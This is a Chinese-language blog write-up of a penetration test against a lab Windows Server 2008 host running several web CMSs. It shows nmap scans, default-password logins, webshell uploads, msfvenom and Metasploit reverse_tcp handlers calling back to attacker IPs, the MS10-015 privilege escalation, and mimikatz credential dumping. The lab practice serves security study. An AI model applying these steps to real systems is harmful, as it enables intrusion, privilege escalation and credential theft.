记一次对Win2008(x64) 数据中心版的测试

开搞

环境:IIS 7.0 + MSSQL 2008 + 赛门铁克3.3 Apache/2.2.15 + Mysql 5.5.27 + php-5.3.15
本机:kali 2019
感谢@klion提供环境
将继续学习Windows下的安全测试

测试一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~# nmap -sC -sV 192.168.3.13
PORT STATE SERVICE VERSION
23/tcp open telnet?
| fingerprint-strings:
| GetRequest, TerminalServerCookie, oracle-tns:
|_ telnet
80/tcp open http Apache httpd 2.2.15 ((Win32) PHP/5.3.15)
|_http-server-header: Apache/2.2.15 (Win32) PHP/5.3.15
|_http-title: phpinfo()
82/tcp open http Microsoft IIS httpd 7.0
| http-cookie-flags:
| /:
| ASPSESSIONIDQCSTBQCD:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.0
|_http-title: \xC6\xFB\xB3\xB5\xC5\xE4\xBC\xFE\xC6\xF3\xD2\xB5\xCD\xF8\xD5\xBE\xB9\xDC\xC0\xED\xCF\xB5\xCD\xB3v1.0--\xCA\xD7\xD2\xB3


点击查看更多
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
84/tcp    open  http               Microsoft IIS httpd 7.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.0
|_http-title: \xE5\x8C\x97\xE4\xBA\xAC\xE4\xB8\x8A\xE4\xBA\x91CMS\xE7\xB3\xBB\xE7\xBB\x9F
85/tcp open http Microsoft IIS httpd 7.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.0
|_http-title: \xE6\xAC\xA2\xE8\xBF\x8E\xE4\xBD\xBF\xE7\x94\xA8\xE9\x94\x90\xE5\x95\x86\xE4\xBC\x81\xE4\xB8\x9ACMS - \xE5\x9F\xBA\xE4\xBA\x8E COMSHARP CMS
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server (R) 2008 Datacenter 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
1433/tcp open ms-sql-s Microsoft SQL Server 2008 10.00.1600.00; RTM
| ms-sql-ntlm-info:
| Target_Name: IIS70-CN
| NetBIOS_Domain_Name: IIS70-CN
| NetBIOS_Computer_Name: IIS70-CN
| DNS_Domain_Name: IIS70-CN
| DNS_Computer_Name: IIS70-CN
|_ Product_Version: 6.0.6001
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-09-21T08:07:44
|_Not valid after: 2049-09-21T08:07:44
|_ssl-date: 2019-09-22T02:21:58+00:00; -1s from scanner time.
2383/tcp open ms-olap4?
3306/tcp open mysql MySQL 5.5.27
| mysql-info:
| Protocol: 10
| Version: 5.5.27
| Thread ID: 5
| Capabilities flags: 63487
| Some Capabilities: ConnectWithDatabase, Support41Auth, Speaks41ProtocolOld, FoundRows, SupportsCompression, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, IgnoreSigpipes, InteractiveClient, LongColumnFlag, LongPassword, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: {=Z1$_4#SW;aUh-BH~gg}
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2019-09-22T02:21:58+00:00; -1s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC

23端口

暂无信息

80端口 Joomla 2.5.20

15.png

1
root@kali:~# whatweb -a 3 -v http://192.168.3.13/Joomla_2.5.20/

16.png
whatweb对国外cms支持还是比较好的,国内云悉好一点
administrator/index.php后台登录界面,admin:admin
17.png
发现修改添加插件处
18.png
传一个马(一直提示上传失败,实际上是成功了的)
19.png
传冰蝎马,蚁剑报错,应该是杀软啥的不让我连接。
20.png

1
2
3
4
5
6
7
8
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.3.128
LHOST => 192.168.3.128
msf5 exploit(multi/handler) > exploit
meterpreter > getuid
Server username: SYSTEM (0)

注:php和Windows模块中的命令差距挺大的

82端口 企成网站管理系统2.0

看看首页是啥样
1.png
第一次碰见把密码放外面的
2.png
轻轻一扫出后台
3.png
登录进去,啥也没有
再扫,发现ewebeditor编辑器
4.png
根据百度,下载了db/ewebeditor.mdb数据库
5.png
得到admin:swit999,版本2.8
上传马儿,蚁剑连接
6.png
上传后门,msf连接

1
2
3
4
5
6
7
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.10 lport=4444 -f exe -o test.exe
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.3.10
msf5 exploit(multi/handler) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

事实上getsystem已经满足不了需求了
在低权限下Windows-Exploit-suggester很有帮助

1
2
3
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
msf5 post(multi/recon/local_exploit_suggester) > exploit

7.png
已经帮我们测试出可利用exp
systeminfo信息扔到提权辅助网页发现有MS17-010,一打就蓝屏
使用MS10-015

1
2
3
4
5
6
7
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 192.168.3.10
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 4445
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 2
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

读个密码

1
2
meterpreter > load mimikatz
meterpreter > kerberos

8.png
登录一下
9.png

84端口 sycms

10.png
一扫死,应该有waf啥的
猜一下后台/admin 猜一下密码admin:admin888
11.png
看见一个编辑器,猜一下编辑器,得到一个CKFinder编辑器,哦豁传不上去马儿
发现可以备份/还原文件,将马儿夹在文件里,进行备份还原
12.png
蚁剑凉了,连接不上,很有可能被拦截了
上冰蝎,连接成功
13.png
使用蝎子反弹meterpreter shell

1
2
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

然后套路一样了

85端口 锐商企业CMS

14.png
老套路admin:admin登录后台
21.png
但是当前文件没有执行权限,尝试转移webshell
22.png
修改为/,发现文件上传到根目录
蝎子连接,转msf

1
2
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

到此结束

如有错误请联系lanbaidetanlang@qq.com

文章目录
  1. 1. 开搞
    1. 1.1. 测试一下
      1. 1.1.1. 23端口
      2. 1.1.2. 80端口 Joomla 2.5.20
      3. 1.1.3. 82端口 企成网站管理系统2.0
      4. 1.1.4. 84端口 sycms
      5. 1.1.5. 85端口 锐商企业CMS
  2. 2. 到此结束